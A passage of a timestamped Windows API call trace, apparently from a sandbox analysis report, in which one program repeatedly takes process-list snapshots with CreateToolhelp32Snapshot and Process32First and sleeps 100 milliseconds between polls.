pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.648] Sleep (dwMilliseconds=0x64) [0124.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0124.874] Process32First (in: hSnapshot=0x232c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.928] Sleep (dwMilliseconds=0x64) [0125.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2318 [0125.065] Process32First (in: hSnapshot=0x2318, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.178] Sleep (dwMilliseconds=0x64) [0125.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x233c [0125.302] Process32First (in: hSnapshot=0x233c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.438] Sleep (dwMilliseconds=0x64) [0125.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x234c [0125.599] Process32First (in: hSnapshot=0x234c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.643] Sleep (dwMilliseconds=0x64) [0125.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2350 [0125.788] Process32First (in: hSnapshot=0x2350, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.027] Sleep (dwMilliseconds=0x64) [0126.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2314 [0126.246] Process32First (in: hSnapshot=0x2314, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.317] Sleep (dwMilliseconds=0x64) [0126.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x236c [0126.478] Process32First (in: hSnapshot=0x236c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.553] Sleep (dwMilliseconds=0x64) [0126.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2350 [0126.693] Process32First (in: hSnapshot=0x2350, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.776] Sleep (dwMilliseconds=0x64) [0126.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2380 [0126.945] Process32First (in: hSnapshot=0x2380, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.020] Sleep (dwMilliseconds=0x64) [0127.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x237c [0127.242] Process32First (in: hSnapshot=0x237c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.352] Sleep (dwMilliseconds=0x64) [0127.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22b8 [0127.495] Process32First (in: hSnapshot=0x22b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.554] Sleep (dwMilliseconds=0x64) [0127.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2370 [0127.690] Process32First (in: hSnapshot=0x2370, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.752] Sleep (dwMilliseconds=0x64) [0127.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2370 [0127.970] Process32First (in: hSnapshot=0x2370, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.124] Sleep (dwMilliseconds=0x64) [0128.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x239c [0128.283] Process32First (in: hSnapshot=0x239c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.357] Sleep (dwMilliseconds=0x64) [0128.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2310 [0128.497] Process32First (in: hSnapshot=0x2310, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.595] Sleep (dwMilliseconds=0x64) [0128.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2364 [0128.744] Process32First (in: hSnapshot=0x2364, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.848] Sleep (dwMilliseconds=0x64) [0128.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2374 [0128.972] Process32First (in: hSnapshot=0x2374, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.019] Sleep (dwMilliseconds=0x64) [0131.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2394 [0131.345] Process32First (in: hSnapshot=0x2394, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.428] Sleep (dwMilliseconds=0x64) [0131.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23b0 [0131.557] Process32First (in: hSnapshot=0x23b0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.693] Sleep (dwMilliseconds=0x64) [0131.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23ac [0131.848] Process32First (in: hSnapshot=0x23ac, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.949] Sleep (dwMilliseconds=0x64) [0132.066] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23c4 [0132.076] Process32First (in: hSnapshot=0x23c4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.162] Sleep (dwMilliseconds=0x64) [0132.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23c4 [0132.284] Process32First (in: hSnapshot=0x23c4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.336] Sleep (dwMilliseconds=0x64) [0132.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23e4 [0132.593] Process32First (in: hSnapshot=0x23e4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.709] Sleep (dwMilliseconds=0x64) [0132.869] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23e4 [0132.881] Process32First (in: hSnapshot=0x23e4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.951] Sleep (dwMilliseconds=0x64) [0133.072] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23dc [0133.083] Process32First (in: hSnapshot=0x23dc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.193] Sleep (dwMilliseconds=0x64) [0133.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23e0 [0133.342] Process32First (in: hSnapshot=0x23e0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.402] Sleep (dwMilliseconds=0x64) [0133.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2370 [0133.522] Process32First (in: hSnapshot=0x2370, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.630] Sleep (dwMilliseconds=0x64) [0133.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23fc [0133.787] Process32First (in: hSnapshot=0x23fc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.870] Sleep (dwMilliseconds=0x64) [0134.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2410 [0134.032] Process32First (in: hSnapshot=0x2410, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.099] Sleep (dwMilliseconds=0x64) [0134.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2414 [0134.308] Process32First (in: hSnapshot=0x2414, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.368] Sleep (dwMilliseconds=0x64) [0134.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x241c [0134.490] Process32First (in: hSnapshot=0x241c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.545] Sleep (dwMilliseconds=0x64) [0134.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2420 [0134.693] Process32First (in: hSnapshot=0x2420, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.792] Sleep (dwMilliseconds=0x64) [0134.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0134.926] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.018] Sleep (dwMilliseconds=0x64) [0135.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x242c [0135.158] Process32First (in: hSnapshot=0x242c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.254] Sleep (dwMilliseconds=0x64) [0135.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2440 [0135.384] Process32First (in: hSnapshot=0x2440, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.435] Sleep (dwMilliseconds=0x64) [0135.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x243c [0135.586] Process32First (in: hSnapshot=0x243c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.739] Sleep (dwMilliseconds=0x64) [0135.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2358 [0135.870] Process32First (in: hSnapshot=0x2358, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.932] Sleep (dwMilliseconds=0x64) [0136.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23f4 [0136.056] Process32First (in: hSnapshot=0x23f4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.146] Sleep (dwMilliseconds=0x64) [0136.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2394 [0136.295] Process32First (in: hSnapshot=0x2394, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.355] Sleep (dwMilliseconds=0x64) [0136.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23bc [0136.510] Process32First (in: hSnapshot=0x23bc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.630] Sleep (dwMilliseconds=0x64) [0136.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2458 [0136.787] Process32First (in: hSnapshot=0x2458, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.890] Sleep (dwMilliseconds=0x64) [0136.994] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2358 [0137.006] Process32First (in: hSnapshot=0x2358, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.072] Sleep (dwMilliseconds=0x64) [0137.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2470 [0137.396] Process32First (in: hSnapshot=0x2470, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.506] Sleep (dwMilliseconds=0x64) [0137.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x245c [0137.662] Process32First (in: hSnapshot=0x245c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.757] Sleep (dwMilliseconds=0x64) [0137.869] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2368 [0137.884] Process32First (in: hSnapshot=0x2368, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.987] Sleep (dwMilliseconds=0x64) [0138.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2448 [0138.140] Process32First (in: hSnapshot=0x2448, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.392] Sleep (dwMilliseconds=0x64) [0138.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x245c [0138.586] Process32First (in: hSnapshot=0x245c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.657] Sleep (dwMilliseconds=0x64) [0138.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2454 [0138.794] Process32First (in: hSnapshot=0x2454, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.886] Sleep (dwMilliseconds=0x64) [0138.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2488 [0139.012] Process32First (in: hSnapshot=0x2488, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.091] Sleep (dwMilliseconds=0x64) [0139.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x246c [0139.208] Process32First (in: hSnapshot=0x246c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.318] Sleep (dwMilliseconds=0x64) [0139.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2480 [0139.445] Process32First (in: hSnapshot=0x2480, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.500] Sleep (dwMilliseconds=0x64) [0139.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2484 [0139.647] Process32First (in: hSnapshot=0x2484, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.800] Sleep (dwMilliseconds=0x64) [0139.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x249c [0139.941] Process32First (in: hSnapshot=0x249c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.046] Sleep (dwMilliseconds=0x64) [0140.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2498 [0140.207] Process32First (in: hSnapshot=0x2498, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.287] Sleep (dwMilliseconds=0x64) [0140.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2484 [0140.425] Process32First (in: hSnapshot=0x2484, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.553] Sleep (dwMilliseconds=0x64) [0140.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b0 [0140.694] Process32First (in: hSnapshot=0x24b0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.838] Sleep (dwMilliseconds=0x64) [0140.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2474 [0140.977] Process32First (in: hSnapshot=0x2474, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.069] Sleep (dwMilliseconds=0x64) [0141.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2474 [0141.200] Process32First (in: hSnapshot=0x2474, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.314] Sleep (dwMilliseconds=0x64) [0141.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24c4 [0141.478] Process32First (in: hSnapshot=0x24c4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.528] Sleep (dwMilliseconds=0x64) [0141.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24c0 [0141.689] Process32First (in: hSnapshot=0x24c0, lppe=0x10d5fe20 | out: 